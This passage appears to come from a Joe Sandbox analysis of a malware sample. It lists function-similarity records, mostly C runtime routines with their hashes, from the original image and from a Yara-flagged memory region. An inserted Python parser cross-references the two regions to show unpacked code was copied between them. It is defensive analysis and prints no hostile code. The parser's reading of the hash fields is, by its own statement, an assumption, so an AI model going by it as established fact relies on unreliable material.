                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: 6e23618bcba0e08c76fa4f8d38c1ceef9eaac585c64bc06ca03a1057ab393eb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F08135748A112AC3222B7D6C0DF2F2F56EBC17A1F2541FCF526E2290EE21A802456D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB1B30
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 05BB1B3F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: b903d22202ca20feb85b5dfac58b07c44e686b29abb255243da470b13de47892
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0FC71A0431C73EB20AA589C54FF97B6C9F08290F1080A5ED4567190E7F4BA04C2E8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%
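
Added example (Python, not code from the Joe Sandbox report or its IDA plugin): a parser for the Similarity records above that groups them by Opcode ID and reports functions which occur both in the PE-backed image at 00400000 (based on PE: true) and in the non-PE-backed region at 05BB0000 (based on PE: false, Yara matches). The excerpt embedded in the block is copied from the records above, trimmed to the fields the parser reads. The reading that an identical Opcode ID with a differing Instruction ID means the same code with rebased operands is an assumption of this example, not something the report states.

```python
import re
from collections import defaultdict

# Excerpt copied from the Similarity records above, trimmed to the fields the
# parser reads; a record ends at its 'Uniqueness Score' line.
REPORT_EXCERPT = """
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• API ID: ErrorLast$_free$_abort
• API String ID: 3160817290-0
• Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Yara matches
• API ID: ErrorLast$_free$_abort
• API String ID: 3160817290-0
• Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction ID: 6e23618bcba0e08c76fa4f8d38c1ceef9eaac585c64bc06ca03a1057ab393eb5
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-2564449678
• Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
• Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• API ID: Exception@8Throwstd::system_error::system_error
• API String ID: 1589814233-1866435925
• Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
• Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Yara matches
• API ID: Exception@8Throwstd::system_error::system_error
• API String ID: 1589814233-1866435925
• Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
• Instruction ID: b903d22202ca20feb85b5dfac58b07c44e686b29abb255243da470b13de47892
Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SOURCE_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")


def parse_records(text):
    """Return one dict per record; the report indents every cell, so strip it."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Uniqueness Score"):
            if "Opcode ID" in current:
                records.append(current)
            current = {}
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # section headers such as 'Yara matches' carry no field
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Source File":
            src = SOURCE_RE.search(value)
            if src is None:
                continue  # no offset: the record is ignored by the cross-reference
            current["offset"] = int(src.group("offset"), 16)
            current["based_on_pe"] = src.group("pe") == "true"
        current[key] = value
    if "Opcode ID" in current:
        records.append(current)
    return records


def shared_opcode_ids(records):
    """Opcode IDs seen at more than one dump offset, with their records."""
    by_opcode = defaultdict(list)
    for rec in records:
        if "offset" in rec:
            by_opcode[rec["Opcode ID"]].append(rec)
    return {op: occ for op, occ in by_opcode.items()
            if len({r["offset"] for r in occ}) > 1}


def relocated_copies(records):
    """(opcode, image offset, other offset, API ID) for code that recurs outside
    the PE-backed image with the same Opcode ID but a different Instruction ID.
    Assumption, not stated in the report: Opcode ID hashes opcodes only while
    Instruction ID also covers operands, so this pattern is the same code with
    rebased operands rather than a different function."""
    found = []
    for opcode, occ in shared_opcode_ids(records).items():
        for a in (r for r in occ if r["based_on_pe"]):
            for b in (r for r in occ if not r["based_on_pe"]):
                if a["Instruction ID"] != b["Instruction ID"]:
                    found.append((opcode, a["offset"], b["offset"], a.get("API ID", "")))
    return found


if __name__ == "__main__":
    for opcode, img, other, apis in relocated_copies(parse_records(REPORT_EXCERPT)):
        print(f"{opcode[:16]}...  {img:#010x} (PE) -> {other:#010x} (non-PE)  {apis}")
```

Run stand-alone it lists the two functions above that recur in the 05BB0000 region (the ErrorLast$_free$_abort routine and the std::system_error thrower); fed the full report text instead of the excerpt, the same pass enumerates every function that region shares with the original image, which is a quick way to confirm that a non-PE-backed dump is a relocated copy of the unpacked sample rather than unrelated code.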

Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
• Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: da8b6409bf716081acfa2913be97b716571dfc89e79d2b552b7eb0fcbfcbeaee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A719071A0561F9BCB21DB54C884AFFBF76FF41310B2441EEE515A7280DB70A941C7A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                  • Instruction ID: 21871a425409f653782abd41f0773fc05d7a11495ab4d632d5cf13ecfec7c9fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D651AF31A00215AFDB20DF69C890A6A7BF5FF45721B1405EEE80ADB250EB71FA018B48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: 1e458b5bd69bfedc18229d8ebc086232066fc39520b98dff16ab5cac34c23d9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5641CF32A002049BDB24DF68C884A6ABBB6EF85314B1545EDD556EB291EBB1B901CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
• Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
• Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
• Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
• _free.LIBCMT ref: 0041E598
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
• Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
• Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
• Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 05BCE7A3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05BCE7C6
  • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05BCE7EC
• _free.LIBCMT ref: 05BCE7FF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05BCE80E
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
• Instruction ID: f72cd91c361b48458bbf3aa1de0a8fbad73a37823bcc8955e9f52d8ffaf5edcc
• Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
• Instruction Fuzzy Hash: B5017172706725BF273266AA5C8CC7F7E6DEAC29A031501EDF905D6100EE61ED0281B9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
• _free.LIBCMT ref: 00416DD7
• _free.LIBCMT ref: 00416DFE
• SetLastError.KERNEL32(00000000), ref: 00416E0B
• SetLastError.KERNEL32(00000000), ref: 00416E14
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
• Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,05BC25ED,05BC7307,?,05BC6FAE,00000001,00000364,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC7009
• _free.LIBCMT ref: 05BC703E
• _free.LIBCMT ref: 05BC7065
• SetLastError.KERNEL32(00000000), ref: 05BC7072
• SetLastError.KERNEL32(00000000), ref: 05BC707B
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
